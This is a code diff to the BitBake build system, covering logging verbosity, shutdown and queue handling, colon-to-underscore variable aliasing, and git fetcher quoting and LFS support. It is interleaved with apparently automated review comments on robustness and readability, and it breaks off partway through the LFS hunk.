-xsltproc -o /tmp/titlepage.xsl \
- --xinclude \
- $XSL_BASE_URI/template/titlepage.xsl \
- $TEMPLATEDIR/titlepage.templates.xml || exit 1
-
-# Creates the file needed for FOP
-xsltproc --xinclude \
- --stringparam hyphenate false \
- --stringparam formal.title.placement "figure after" \
- --stringparam ulink.show 1 \
- --stringparam body.font.master 9 \
- --stringparam title.font.master 11 \
- --stringparam draft.watermark.image "$TEMPLATEDIR/draft.png" \
- --stringparam chapter.autolabel 1 \
- --stringparam appendix.autolabel A \
- --stringparam section.autolabel 1 \
- --stringparam section.label.includes.component.label 1 \
- --output $FO \
- $TEMPLATEDIR/db-pdf.xsl \
- $1 || exit 1
-
-# Invokes the Java version of FOP. Uses the additional configuration file common/fop-config.xml
-fop -c $TEMPLATEDIR/fop-config.xml -fo $FO -pdf $PDF || exit 1
-
-rm -f $FO
-rm -f /tmp/titlepage.xsl
-
-echo
-echo " #### Success! $PDF ready. ####"
-echo
diff --git a/bitbake/lib/bb/__init__.py b/bitbake/lib/bb/__init__.py
index b96466e654..ba8039497f 100644
--- a/bitbake/lib/bb/__init__.py
+++ b/bitbake/lib/bb/__init__.py
@@ -15,6 +15,13 @@ import sys
if sys.version_info < (3, 5, 0):
raise RuntimeError("Sorry, python 3.5.0 or later is required for this version of bitbake")
+if sys.version_info < (3, 10, 0):
+ # With python 3.8 and 3.9, we see errors of "libgcc_s.so.1 must be installed for pthread_cancel to work"
+ # https://stackoverflow.com/questions/64797838/libgcc-s-so-1-must-be-installed-for-pthread-cancel-to-work
+ # https://bugs.ams1.psf.io/issue42888
+ # so ensure libgcc_s is loaded early on
+ import ctypes
+ libgcc_s = ctypes.CDLL('libgcc_s.so.1')
class BBHandledException(Exception):
"""
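Review bot: The unguarded `ctypes.CDLL('libgcc_s.so.1')` raises OSError when the loader cannot resolve that soname, and because it runs at module import, `import bb` then fails outright on any Python older than 3.10. Since the preload is only a workaround, I'd either let such hosts continue, `try: libgcc_s = ctypes.CDLL('libgcc_s.so.1')` / `except OSError: libgcc_s = None`, or fail with a message that names the missing library. The library is located by bare soname through the normal loader search path, so the comment should also say that the build environment decides which file is loaded.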
@@ -47,7 +54,7 @@ class BBLogger(Logger):
if not bb.event.worker_pid:
if self.name in bb.msg.loggerDefaultDomains and loglevel > (bb.msg.loggerDefaultDomains[self.name]):
return
- if loglevel > bb.msg.loggerDefaultLogLevel:
+ if loglevel < bb.msg.loggerDefaultLogLevel:
return
return self.log(loglevel, msg, *args, **kwargs)
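Review bot: After this change the two adjacent guards compare in opposite directions: the per-domain check returns when `loglevel >` the domain level, while the default check now returns when `loglevel <` the default level. Nothing in the hunk says that this asymmetry is intended. A one-line comment on the changed guard, e.g. `# drop messages below the default log level`, would make it reviewable; if the domain check was meant to flip too, it is still in the old form. The enclosing method starts outside the hunk, so how `loglevel` is derived is not visible here.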
diff --git a/bitbake/lib/bb/build.py b/bitbake/lib/bb/build.py
index 23b6ee455f..aaada8a18b 100644
--- a/bitbake/lib/bb/build.py
+++ b/bitbake/lib/bb/build.py
@@ -27,6 +27,9 @@ from bb import data, event, utils
bblogger = logging.getLogger('BitBake')
logger = logging.getLogger('BitBake.Build')
+verboseShellLogging = False
+verboseStdoutLogging = False
+
__mtime_cache = {}
def cached_mtime_noerror(f):
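Review bot: `verboseShellLogging` and `verboseStdoutLogging` are added as bare module globals with no comment, and none of the build.py hunks on this page assigns them, so a reader cannot tell who turns them on. I'd add a comment above them such as `# Set by the server from the build_verbose_shell / build_verbose_stdout options; read when running shell tasks and in _exec_task`. That wording assumes the options added in cookerdata.py are what drive them, which this page does not show.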
@@ -290,8 +293,8 @@ def exec_func_python(func, d, runfile, cwd=None):
lineno = int(d.getVarFlag(func, "lineno", False))
bb.methodpool.insert_method(func, text, fn, lineno - 1)
- comp = utils.better_compile(code, func, "exec_python_func() autogenerated")
- utils.better_exec(comp, {"d": d}, code, "exec_python_func() autogenerated")
+ comp = utils.better_compile(code, func, "exec_func_python() autogenerated")
+ utils.better_exec(comp, {"d": d}, code, "exec_func_python() autogenerated")
finally:
bb.debug(2, "Python function %s finished" % func)
@@ -371,7 +374,7 @@ def exec_func_shell(func, d, runfile, cwd=None):
bb.data.emit_func(func, script, d)
- if bb.msg.loggerVerboseLogs:
+ if verboseShellLogging or bb.utils.to_boolean(d.getVar("BB_VERBOSE_LOGS", False)):
script.write("set -x\n")
if cwd:
script.write("cd '%s'\n" % cwd)
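Review bot: `set -x` is now enabled by either the module flag or `BB_VERBOSE_LOGS`, and the trace it writes shows each command after expansion, so a credential passed on a command line or expanded from a variable ends up in the task's run log. The condition deserves a comment saying so, e.g. `# set -x traces expanded commands into the task log; treat verbose logs as sensitive`. `d.getVar("BB_VERBOSE_LOGS", False)` is also read for every shell task now instead of once at configuration time, so a malformed value would surface per task, depending on how `to_boolean` handles it, which is not visible here. exec_func_shell starts and ends outside the hunk.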
@@ -391,7 +394,7 @@ exit $ret
if fakerootcmd:
cmd = [fakerootcmd, runfile]
- if bb.msg.loggerDefaultVerbose:
+ if verboseStdoutLogging:
logfile = LogTee(logger, StdoutNoopContextManager())
else:
logfile = StdoutNoopContextManager()
@@ -587,11 +590,15 @@ def _exec_task(fn, task, d, quieterr):
except bb.BBHandledException:
event.fire(TaskFailed(task, fn, logfn, localdata, True), localdata)
return 1
- except Exception as exc:
+ except (Exception, SystemExit) as exc:
if quieterr:
event.fire(TaskFailedSilent(task, fn, logfn, localdata), localdata)
else:
errprinted = errchk.triggered
+ # If the output is already on stdout, we've printed the information in the
+ # logs once already so don't duplicate
+ if verboseStdoutLogging:
+ errprinted = True
logger.error(str(exc))
event.fire(TaskFailed(task, fn, logfn, localdata, errprinted), localdata)
return 1
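Review bot: With `SystemExit` added to the handler, `logger.error(str(exc))` logs only the exit status (for `sys.exit(1)` the message is just `1`), which gives no hint that the task called exit. I'd format that case explicitly, e.g. `logger.error("Task called sys.exit(%r)" % (exc.code,) if isinstance(exc, SystemExit) else str(exc))`. _exec_task starts outside the hunk, so the `try` body that can raise it is not visible here.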
@@ -901,6 +908,8 @@ def tasksbetween(task_start, task_end, d):
def follow_chain(task, endtask, chain=None):
if not chain:
chain = []
+ if task in chain:
+ bb.fatal("Circular task dependencies as %s depends on itself via the chain %s" % (task, " -> ".join(chain)))
chain.append(task)
for othertask in tasks:
if othertask == task:
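Review bot: The fatal message joins `chain` before `task` is appended, so the printed path stops one step short of the repeat and the reader has to infer the closing edge. `" -> ".join(chain + [task])` would show the full cycle. `task in chain` is a linear scan on every recursive call, which is fine for small task graphs, though a set kept alongside the list would avoid it. follow_chain continues past the end of the hunk.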
diff --git a/bitbake/lib/bb/command.py b/bitbake/lib/bb/command.py
index 6abf38668b..b8429b2773 100644
--- a/bitbake/lib/bb/command.py
+++ b/bitbake/lib/bb/command.py
@@ -20,6 +20,7 @@ Commands are queued in a CommandQueue
from collections import OrderedDict, defaultdict
+import io
import bb.event
import bb.cooker
import bb.remotedata
@@ -74,8 +75,12 @@ class Command:
result = command_method(self, commandline)
except CommandError as exc:
return None, exc.args[0]
- except (Exception, SystemExit):
+ except (Exception, SystemExit) as exc:
import traceback
+ if isinstance(exc, bb.BBHandledException):
+ # We need to start returning real exceptions here. Until we do, we can't
+ # tell if an exception is an instance of bb.BBHandledException
+ return None, "bb.BBHandledException()\n" + traceback.format_exc()
return None, traceback.format_exc()
else:
return result, None
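Review bot: The handled-exception case is signalled in-band by prefixing the traceback text with the literal `"bb.BBHandledException()\n"`, so every client has to match that exact string, and the literal is not named anywhere in this hunk. Until real exceptions are returned, as the new comment says, I'd hoist it into a module-level constant and have the receiving side reference the same name. The enclosing method starts outside the hunk.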
@@ -474,6 +479,17 @@ class CommandsSync:
d = command.remotedatastores[dsindex].varhistory
return getattr(d, method)(*args, **kwargs)
+ def dataStoreConnectorVarHistCmdEmit(self, command, params):
+ dsindex = params[0]
+ var = params[1]
+ oval = params[2]
+ val = params[3]
+ d = command.remotedatastores[params[4]]
+
+ o = io.StringIO()
+ command.remotedatastores[dsindex].varhistory.emit(var, oval, val, o, d)
+ return o.getvalue()
+
def dataStoreConnectorIncHistCmd(self, command, params):
dsindex = params[0]
method = params[1]
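Review bot: `dataStoreConnectorVarHistCmdEmit` names four of its parameters and then indexes `params[4]` inline, which hides that the call takes two datastore indices. Unpacking once, `dsindex, var, oval, val, d_dsindex = params`, makes the arity explicit and turns a short `params` into one clear error. Both indices come from the client and index `command.remotedatastores` unchecked, as the neighbouring commands in this hunk also do. A one-line docstring saying that it returns what `varhistory.emit` wrote to the `StringIO` buffer would help.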
@@ -620,6 +636,16 @@ class CommandsAsync:
command.finishAsyncCommand()
findFilesMatchingInDir.needcache = False
+ def testCookerCommandEvent(self, command, params):
+ """
+ Dummy command used by OEQA selftest to test tinfoil without IO
+ """
+ pattern = params[0]
+
+ command.cooker.testCookerCommandEvent(pattern)
+ command.finishAsyncCommand()
+ testCookerCommandEvent.needcache = False
+
def findConfigFilePath(self, command, params):
"""
Find the path of the requested configuration file
diff --git a/bitbake/lib/bb/compat.py b/bitbake/lib/bb/compat.py
deleted file mode 100644
index 49356681ab..0000000000
--- a/bitbake/lib/bb/compat.py
+++ /dev/null
@@ -1,10 +0,0 @@
-#
-# SPDX-License-Identifier: GPL-2.0-only
-#
-
-"""Code pulled from future python versions, here for compatibility"""
-
-from collections import MutableMapping, KeysView, ValuesView, ItemsView, OrderedDict
-from functools import total_ordering
-
-
diff --git a/bitbake/lib/bb/cooker.py b/bitbake/lib/bb/cooker.py
index d90bd3945f..6743bce585 100644
--- a/bitbake/lib/bb/cooker.py
+++ b/bitbake/lib/bb/cooker.py
@@ -13,7 +13,6 @@ import sys, os, glob, os.path, re, time
import itertools
import logging
import multiprocessing
-import sre_constants
import threading
from io import StringIO, UnsupportedOperation
from contextlib import closing
@@ -411,10 +410,7 @@ class BBCooker:
self.data.disableTracking()
def parseConfiguration(self):
- # Set log file verbosity
- verboselogs = bb.utils.to_boolean(self.data.getVar("BB_VERBOSE_LOGS", False))
- if verboselogs:
- bb.msg.loggerVerboseLogs = True
+ self.updateCacheSync()
# Change nice level if we're asked to
nice = self.data.getVar("BB_NICE_LEVEL")
@@ -1022,6 +1018,11 @@ class BBCooker:
if matches:
bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data)
+ def testCookerCommandEvent(self, filepattern):
+ # Dummy command used by OEQA selftest to test tinfoil without IO
+ matches = ["A", "B"]
+ bb.event.fire(bb.event.FilesMatchingFound(filepattern, matches), self.data)
+
def findProviders(self, mc=''):
return bb.providers.findProviders(self.databuilder.mcdata[mc], self.recipecaches[mc], self.recipecaches[mc].pkg_pn)
@@ -1636,6 +1637,7 @@ class BBCooker:
return
def post_serve(self):
+ self.shutdown(force=True)
prserv.serv.auto_shutdown()
if self.hashserv:
self.hashserv.process.terminate()
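Review bot: `self.shutdown(force=True)` now runs first in `post_serve`, so if it raises, `prserv.serv.auto_shutdown()` and the hashserv `terminate()` below it are skipped and those helper processes may be left running. Putting the call under `try:` and the existing cleanup under `finally:` keeps the teardown unconditional. post_serve continues past the end of the hunk.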
@@ -1650,6 +1652,7 @@ class BBCooker:
if self.parser:
self.parser.shutdown(clean=not force, force=force)
+ self.parser.final_cleanup()
def finishcommand(self):
self.state = state.initial
@@ -1791,7 +1794,7 @@ class CookerCollectFiles(object):
try:
re.compile(mask)
bbmasks.append(mask)
- except sre_constants.error:
+ except re.error:
collectlog.critical("BBMASK contains an invalid regular expression, ignoring: %s" % mask)
# Then validate the combined regular expressions. This should never
@@ -1799,7 +1802,7 @@ class CookerCollectFiles(object):
bbmask = "|".join(bbmasks)
try:
bbmask_compiled = re.compile(bbmask)
- except sre_constants.error:
+ except re.error:
collectlog.critical("BBMASK is not a valid regular expression, ignoring: %s" % bbmask)
bbmask = None
@@ -1931,7 +1934,8 @@ class Parser(multiprocessing.Process):
except queue.Empty:
pass
else:
- self.results.cancel_join_thread()
+ self.results.close()
+ self.results.join_thread()
break
if pending:
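Review bot: Replacing `cancel_join_thread()` with `close()` plus `join_thread()` makes the worker wait until everything it queued on `self.results` has been flushed to the pipe. On the quit path the child therefore depends on the parent still draining that queue; if the parent has stopped reading, the worker blocks here instead of exiting. That dependency deserves a comment at this spot, e.g. `# parent must keep reading results until we exit, or join_thread() blocks`. The same two lines are repeated in the next hunk at the `IndexError` break, and a small private helper would keep them in step. The loop starts outside the hunk.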
@@ -1940,6 +1944,8 @@ class Parser(multiprocessing.Process):
try:
job = self.jobs.pop()
except IndexError:
+ self.results.close()
+ self.results.join_thread()
break
result = self.parse(*job)
# Clear the siggen cache after parsing to control memory usage, its huge
@@ -2015,6 +2021,7 @@ class CookerParser(object):
self.start()
self.haveshutdown = False
+ self.syncthread = None
def start(self):
self.results = self.load_cached()
@@ -2056,12 +2063,9 @@ class CookerParser(object):
self.total)
bb.event.fire(event, self.cfgdata)
- for process in self.processes:
- self.parser_quit.put(None)
- else:
- self.parser_quit.cancel_join_thread()
- for process in self.processes:
- self.parser_quit.put(None)
+
+ for process in self.processes:
+ self.parser_quit.put(None)
# Cleanup the queue before call process.join(), otherwise there might be
# deadlocks.
@@ -2078,9 +2082,13 @@ class CookerParser(object):
else:
process.join()
+ self.parser_quit.close()
+ # Allow data left in the cancel queue to be discarded
+ self.parser_quit.cancel_join_thread()
+
sync = threading.Thread(target=self.bb_cache.sync)
+ self.syncthread = sync
sync.start()
- multiprocessing.util.Finalize(None, sync.join, exitpriority=-100)
bb.codeparser.parser_cache_savemerge()
bb.fetch.fetcher_parse_done()
if self.cooker.configuration.profile:
@@ -2094,6 +2102,10 @@ class CookerParser(object):
bb.utils.process_profilelog(profiles, pout = pout)
print("Processed parsing statistics saved to %s" % (pout))
+ def final_cleanup(self):
+ if self.syncthread:
+ self.syncthread.join()
+
def load_cached(self):
for filename, appends in self.fromcache:
cached, infos = self.bb_cache.load(filename, appends)
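Review bot: `final_cleanup` joins the sync thread with no timeout and has no docstring. BBCooker.shutdown, in an earlier hunk of this diff, calls it on the forced path as well, so a cache sync that stalls would stall a forced shutdown. A docstring such as `"""Wait for the bb_cache.sync thread started in shutdown() to finish."""` would document the coupling. Whether the force path wants a bounded `join(timeout=...)` with a logged warning is a question for the author.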
@@ -2126,18 +2138,18 @@ class CookerParser(object):
except bb.BBHandledException as exc:
self.error += 1
logger.error('Failed to parse recipe: %s' % exc.recipe)
- self.shutdown(clean=False)
+ self.shutdown(clean=False, force=True)
return False
except ParsingFailure as exc:
self.error += 1
logger.error('Unable to parse %s: %s' %
(exc.recipe, bb.exceptions.to_string(exc.realexception)))
- self.shutdown(clean=False)
+ self.shutdown(clean=False, force=True)
return False
except bb.parse.ParseError as exc:
self.error += 1
logger.error(str(exc))
- self.shutdown(clean=False)
+ self.shutdown(clean=False, force=True)
return False
except bb.data_smart.ExpansionError as exc:
self.error += 1
@@ -2146,7 +2158,7 @@ class CookerParser(object):
tb = list(itertools.dropwhile(lambda e: e.filename.startswith(bbdir), exc.traceback))
logger.error('ExpansionError during parsing %s', value.recipe,
exc_info=(etype, value, tb))
- self.shutdown(clean=False)
+ self.shutdown(clean=False, force=True)
return False
except Exception as exc:
self.error += 1
@@ -2158,7 +2170,7 @@ class CookerParser(object):
# Most likely, an exception occurred during raising an exception
import traceback
logger.error('Exception during parse: %s' % traceback.format_exc())
- self.shutdown(clean=False)
+ self.shutdown(clean=False, force=True)
return False
self.current += 1
diff --git a/bitbake/lib/bb/cookerdata.py b/bitbake/lib/bb/cookerdata.py
index 472423fdc8..30727bf2ee 100644
--- a/bitbake/lib/bb/cookerdata.py
+++ b/bitbake/lib/bb/cookerdata.py
@@ -58,11 +58,14 @@ class ConfigParameters(object):
def updateToServer(self, server, environment):
options = {}
for o in ["abort", "force", "invalidate_stamp",
- "verbose", "debug", "dry_run", "dump_signatures",
+ "debug", "dry_run", "dump_signatures",
"debug_domains", "extra_assume_provided", "profile",
"prefile", "postfile", "server_timeout"]:
options[o] = getattr(self.options, o)
+ options['build_verbose_shell'] = self.options.verbose
+ options['build_verbose_stdout'] = self.options.verbose
+
ret, error = server.runCommand(["updateConfig", options, environment, sys.argv])
if error:
raise Exception("Unable to update the server configuration with local parameters: %s" % error)
@@ -125,6 +128,8 @@ class CookerConfiguration(object):
self.skipsetscene = False
self.invalidate_stamp = False
self.dump_signatures = []
+ self.build_verbose_shell = False
+ self.build_verbose_stdout = False
self.dry_run = False
self.tracking = False
self.xmlrpcinterface = []
@@ -297,6 +302,8 @@ class CookerDataBuilder(object):
multiconfig = (self.data.getVar("BBMULTICONFIG") or "").split()
for config in multiconfig:
+ if config[0].isdigit():
+ bb.fatal("Multiconfig name '%s' is invalid as multiconfigs cannot start with a digit" % config)
mcdata = self.parseConfigurationFiles(self.prefiles, self.postfiles, config)
bb.event.fire(bb.event.ConfigParsed(), mcdata)
self.mcdata[config] = mcdata
@@ -348,6 +355,9 @@ class CookerDataBuilder(object):
layers = (data.getVar('BBLAYERS') or "").split()
broken_layers = []
+ if not layers:
+ bb.fatal("The bblayers.conf file doesn't contain any BBLAYERS definition")
+
data = bb.data.createCopy(data)
approved = bb.utils.approved_variables()
@@ -399,6 +409,8 @@ class CookerDataBuilder(object):
if c in collections_tmp:
bb.fatal("Found duplicated BBFILE_COLLECTIONS '%s', check bblayers.conf or layer.conf to fix it." % c)
compat = set((data.getVar("LAYERSERIES_COMPAT_%s" % c) or "").split())
+ if compat and not layerseries:
+ bb.fatal("No core layer found to work with layer '%s'. Missing entry in bblayers.conf?" % c)
if compat and not (compat & layerseries):
bb.fatal("Layer %s is not compatible with the core layer which only supports these series: %s (layer is compatible with %s)"
% (c, " ".join(layerseries), " ".join(compat)))
diff --git a/bitbake/lib/bb/data.py b/bitbake/lib/bb/data.py
index b0683c5180..1d21e00a1c 100644
--- a/bitbake/lib/bb/data.py
+++ b/bitbake/lib/bb/data.py
@@ -301,6 +301,7 @@ def build_dependencies(key, keys, shelldeps, varflagsexcl, d):
value += "\n_remove of %s" % r
deps |= r2.references
deps = deps | (keys & r2.execs)
+ value = handle_contains(value, r2.contains, d)
return value
if "vardepvalue" in varflags:
diff --git a/bitbake/lib/bb/data_smart.py b/bitbake/lib/bb/data_smart.py
index 7f1b6dcb4f..c46d3f0a08 100644
--- a/bitbake/lib/bb/data_smart.py
+++ b/bitbake/lib/bb/data_smart.py
@@ -17,7 +17,7 @@ BitBake build tools.
# Based on functions from the base bb module, Copyright 2003 Holger Schurig
import copy, re, sys, traceback
-from collections import MutableMapping
+from collections.abc import MutableMapping
import logging
import hashlib
import bb, bb.codeparser
@@ -28,7 +28,7 @@ logger = logging.getLogger("BitBake.Data")
__setvar_keyword__ = ["_append", "_prepend", "_remove"]
__setvar_regexp__ = re.compile(r'(?P<base>.*?)(?P<keyword>_append|_prepend|_remove)(_(?P<add>[^A-Z]*))?$')
-__expand_var_regexp__ = re.compile(r"\${[a-zA-Z0-9\-_+./~]+?}")
+__expand_var_regexp__ = re.compile(r"\${[a-zA-Z0-9\-_+./~:]+?}")
__expand_python_regexp__ = re.compile(r"\${@.+?}")
__whitespace_split__ = re.compile(r'(\s)')
__override_regexp__ = re.compile(r'[a-z0-9]+')
@@ -403,7 +403,7 @@ class DataSmart(MutableMapping):
s = __expand_python_regexp__.sub(varparse.python_sub, s)
except SyntaxError as e:
# Likely unmatched brackets, just don't expand the expression
- if e.msg != "EOL while scanning string literal":
+ if e.msg != "EOL while scanning string literal" and not e.msg.startswith("unterminated string literal"):
raise
if s == olds:
break
@@ -411,6 +411,8 @@ class DataSmart(MutableMapping):
raise
except bb.parse.SkipRecipe:
raise
+ except bb.BBHandledException:
+ raise
except Exception as exc:
tb = sys.exc_info()[2]
raise ExpansionError(varname, s, exc).with_traceback(tb) from exc
@@ -481,6 +483,7 @@ class DataSmart(MutableMapping):
def setVar(self, var, value, **loginfo):
#print("var=" + str(var) + " val=" + str(value))
+ var = var.replace(":", "_")
self.expand_cache = {}
parsing=False
if 'parsing' in loginfo:
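Review bot: The `var = var.replace(":", "_")` normalisation added at the top of setVar is repeated verbatim in renameVar, delVar, setVarFlag, getVarFlag, delVarFlag, appendVarFlag, prependVarFlag, setVarFlags, getVarFlags and delVarFlags in the following hunks, and none of them says why a colon is mapped to an underscore. A single private helper would keep the rule in one place. A one-line comment such as `# ':' is accepted as an alias for '_' in variable names` (wording to be confirmed by the author) would tell readers that `A:b` and `A_b` now name the same variable. The method bodies continue outside these hunks.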
@@ -589,6 +592,8 @@ class DataSmart(MutableMapping):
"""
Rename the variable key to newkey
"""
+ key = key.replace(":", "_")
+ newkey = newkey.replace(":", "_")
if key == newkey:
bb.warn("Calling renameVar with equivalent keys (%s) is invalid" % key)
return
@@ -637,6 +642,7 @@ class DataSmart(MutableMapping):
self.setVar(var + "_prepend", value, ignore=True, parsing=True)
def delVar(self, var, **loginfo):
+ var = var.replace(":", "_")
self.expand_cache = {}
loginfo['detail'] = ""
@@ -664,6 +670,7 @@ class DataSmart(MutableMapping):
override = None
def setVarFlag(self, var, flag, value, **loginfo):
+ var = var.replace(":", "_")
self.expand_cache = {}
if 'op' not in loginfo:
@@ -687,6 +694,7 @@ class DataSmart(MutableMapping):
self.dict["__exportlist"]["_content"].add(var)
def getVarFlag(self, var, flag, expand=True, noweakdefault=False, parsing=False, retparser=False):
+ var = var.replace(":", "_")
if flag == "_content":
cachename = var
else:
@@ -814,6 +822,7 @@ class DataSmart(MutableMapping):
return value
def delVarFlag(self, var, flag, **loginfo):
+ var = var.replace(":", "_")
self.expand_cache = {}
local_var, _ = self._findVar(var)
@@ -831,6 +840,7 @@ class DataSmart(MutableMapping):
del self.dict[var][flag]
def appendVarFlag(self, var, flag, value, **loginfo):
+ var = var.replace(":", "_")
loginfo['op'] = 'append'
loginfo['flag'] = flag
self.varhistory.record(**loginfo)
@@ -838,6 +848,7 @@ class DataSmart(MutableMapping):
self.setVarFlag(var, flag, newvalue, ignore=True)
def prependVarFlag(self, var, flag, value, **loginfo):
+ var = var.replace(":", "_")
loginfo['op'] = 'prepend'
loginfo['flag'] = flag
self.varhistory.record(**loginfo)
@@ -845,6 +856,7 @@ class DataSmart(MutableMapping):
self.setVarFlag(var, flag, newvalue, ignore=True)
def setVarFlags(self, var, flags, **loginfo):
+ var = var.replace(":", "_")
self.expand_cache = {}
infer_caller_details(loginfo)
if not var in self.dict:
@@ -859,6 +871,7 @@ class DataSmart(MutableMapping):
self.dict[var][i] = flags[i]
def getVarFlags(self, var, expand = False, internalflags=False):
+ var = var.replace(":", "_")
local_var, _ = self._findVar(var)
flags = {}
@@ -875,6 +888,7 @@ class DataSmart(MutableMapping):
def delVarFlags(self, var, **loginfo):
+ var = var.replace(":", "_")
self.expand_cache = {}
if not var in self.dict:
self._makeShadowCopy(var)
@@ -1005,7 +1019,7 @@ class DataSmart(MutableMapping):
else:
data.update({key:value})
- varflags = d.getVarFlags(key, internalflags = True)
+ varflags = d.getVarFlags(key, internalflags = True, expand=["vardepvalue"])
if not varflags:
continue
for f in varflags:
diff --git a/bitbake/lib/bb/event.py b/bitbake/lib/bb/event.py
index d1359f0100..cb0b3b3345 100644
--- a/bitbake/lib/bb/event.py
+++ b/bitbake/lib/bb/event.py
@@ -10,17 +10,17 @@ BitBake build tools.
# SPDX-License-Identifier: GPL-2.0-only
#
-import sys
-import pickle
-import logging
-import atexit
-import traceback
import ast
+import atexit
+import collections
+import logging
+import pickle
+import sys
import threading
+import traceback
-import bb.utils
-import bb.compat
import bb.exceptions
+import bb.utils
# This is the pid for which we should generate the event. This is set when
# the runqueue forks off.
@@ -56,7 +56,7 @@ def set_class_handlers(h):
_handlers = h
def clean_class_handlers():
- return bb.compat.OrderedDict()
+ return collections.OrderedDict()
# Internal
_handlers = clean_class_handlers()
diff --git a/bitbake/lib/bb/fetch2/__init__.py b/bitbake/lib/bb/fetch2/__init__.py
index eb112f069d..3e6555bd67 100644
--- a/bitbake/lib/bb/fetch2/__init__.py
+++ b/bitbake/lib/bb/fetch2/__init__.py
@@ -562,6 +562,9 @@ def verify_checksum(ud, d, precomputed={}):
checksum_expected = getattr(ud, "%s_expected" % checksum_id)
+ if checksum_expected == '':
+ checksum_expected = None
+
return {
"id": checksum_id,
"name": checksum_name,
@@ -612,7 +615,7 @@ def verify_checksum(ud, d, precomputed={}):
for ci in checksum_infos:
if ci["expected"] and ci["expected"] != ci["data"]:
- messages.append("File: '%s' has %s checksum %s when %s was " \
+ messages.append("File: '%s' has %s checksum '%s' when '%s' was " \
"expected" % (ud.localpath, ci["id"], ci["data"], ci["expected"]))
bad_checksum = ci["data"]
@@ -853,11 +856,6 @@ def runfetchcmd(cmd, d, quiet=False, cleanup=None, log=None, workdir=None):
if val:
cmd = 'export ' + var + '=\"%s\"; %s' % (val, cmd)
- # Ensure that a _PYTHON_SYSCONFIGDATA_NAME value set by a recipe
- # (for example via python3native.bbclass since warrior) is not set for
- # host Python (otherwise tools like git-make-shallow will fail)
- cmd = 'unset _PYTHON_SYSCONFIGDATA_NAME; ' + cmd
-
# Disable pseudo as it may affect ssh, potentially causing it to hang.
cmd = 'export PSEUDO_DISABLED=1; ' + cmd
diff --git a/bitbake/lib/bb/fetch2/git.py b/bitbake/lib/bb/fetch2/git.py
index dcecff5d38..cad1ae8207 100644
--- a/bitbake/lib/bb/fetch2/git.py
+++ b/bitbake/lib/bb/fetch2/git.py
@@ -44,7 +44,8 @@ Supported SRC_URI options are:
- nobranch
Don't check the SHA validation for branch. set this option for the recipe
- referring to commit which is valid in tag instead of branch.
+ referring to commit which is valid in any namespace (branch, tag, ...)
+ instead of branch.
The default is "0", set nobranch=1 if needed.
- usehead
@@ -63,10 +64,12 @@ import errno
import fnmatch
import os
import re
+import shlex
import subprocess
import tempfile
import bb
import bb.progress
+from contextlib import contextmanager
from bb.fetch2 import FetchMethod
from bb.fetch2 import runfetchcmd
from bb.fetch2 import logger
@@ -140,6 +143,10 @@ class Git(FetchMethod):
ud.proto = 'file'
else:
ud.proto = "git"
+ if ud.host == "github.com" and ud.proto == "git":
+ # github stopped supporting git protocol
+ # https://github.blog/2021-09-01-improving-git-protocol-security-github/#no-more-unauthenticated-git
+ ud.proto = "https"
if not ud.proto in ('git', 'file', 'ssh', 'http', 'https', 'rsync'):
raise bb.fetch2.ParameterError("Invalid protocol type", ud.url)
@@ -219,7 +226,12 @@ class Git(FetchMethod):
ud.shallow = False
if ud.usehead:
- ud.unresolvedrev['default'] = 'HEAD'
+ # When usehead is set let's associate 'HEAD' with the unresolved
+ # rev of this repository. This will get resolved into a revision
+ # later. If an actual revision happens to have also been provided
+ # then this setting will be overridden.
+ for name in ud.names:
+ ud.unresolvedrev[name] = 'HEAD'
ud.basecmd = d.getVar("FETCHCMD_git") or "git -c core.fsyncobjectfiles=0"
@@ -342,7 +354,7 @@ class Git(FetchMethod):
# We do this since git will use a "-l" option automatically for local urls where possible
if repourl.startswith("file://"):
repourl = repourl[7:]
- clone_cmd = "LANG=C %s clone --bare --mirror \"%s\" %s --progress" % (ud.basecmd, repourl, ud.clonedir)
+ clone_cmd = "LANG=C %s clone --bare --mirror %s %s --progress" % (ud.basecmd, shlex.quote(repourl), ud.clonedir)
if ud.proto.lower() != 'file':
bb.fetch2.check_network_access(d, clone_cmd, ud.url)
progresshandler = GitProgressHandler(d)
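Review bot: `ud.clonedir` is still interpolated into `clone_cmd` unquoted, right next to the newly quoted `repourl`, so the command string is only partly shell-safe. How clonedir is derived is not visible in this hunk, but if it can contain spaces or shell metacharacters it should get the same treatment: `% (ud.basecmd, shlex.quote(repourl), shlex.quote(ud.clonedir))`. The same applies to the `tar -xf - -C %s` command built from `ud.clonedir` in the LFS hunk and to the `tar -czf %s .` commands built from `tfile` in build_mirror_data.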
@@ -354,8 +366,12 @@ class Git(FetchMethod):
if "origin" in output:
runfetchcmd("%s remote rm origin" % ud.basecmd, d, workdir=ud.clonedir)
- runfetchcmd("%s remote add --mirror=fetch origin \"%s\"" % (ud.basecmd, repourl), d, workdir=ud.clonedir)
- fetch_cmd = "LANG=C %s fetch -f --progress \"%s\" refs/*:refs/*" % (ud.basecmd, repourl)
+ runfetchcmd("%s remote add --mirror=fetch origin %s" % (ud.basecmd, shlex.quote(repourl)), d, workdir=ud.clonedir)
+
+ if ud.nobranch:
+ fetch_cmd = "LANG=C %s fetch -f --progress %s refs/*:refs/*" % (ud.basecmd, shlex.quote(repourl))
+ else:
+ fetch_cmd = "LANG=C %s fetch -f --progress %s refs/heads/*:refs/heads/* refs/tags/*:refs/tags/*" % (ud.basecmd, shlex.quote(repourl))
if ud.proto.lower() != 'file':
bb.fetch2.check_network_access(d, fetch_cmd, ud.url)
progresshandler = GitProgressHandler(d)
@@ -378,7 +394,50 @@ class Git(FetchMethod):
if missing_rev:
raise bb.fetch2.FetchError("Unable to find revision %s even from upstream" % missing_rev)
+ if self._contains_lfs(ud, d, ud.clonedir) and self._need_lfs(ud):
+ # Unpack temporary working copy, use it to run 'git checkout' to force pre-fetching
+ # of all LFS blobs needed at the the srcrev.
+ #
+ # It would be nice to just do this inline here by running 'git-lfs fetch'
+ # on the bare clonedir, but that operation requires a working copy on some
+ # releases of Git LFS.
+ tmpdir = tempfile.mkdtemp(dir=d.getVar('DL_DIR'))
+ try:
+ # Do the checkout. This implicitly involves a Git LFS fetch.
+ Git.unpack(self, ud, tmpdir, d)
+
+ # Scoop up a copy of any stuff that Git LFS downloaded. Merge them into
+ # the bare clonedir.
+ #
+ # As this procedure is invoked repeatedly on incremental fetches as
+ # a recipe's SRCREV is bumped throughout its lifetime, this will
+ # result in a gradual accumulation of LFS blobs in <ud.clonedir>/lfs
+ # corresponding to all the blobs reachable from the different revs
+ # fetched across time.
+ #
+ # Only do this if the unpack resulted in a .git/lfs directory being
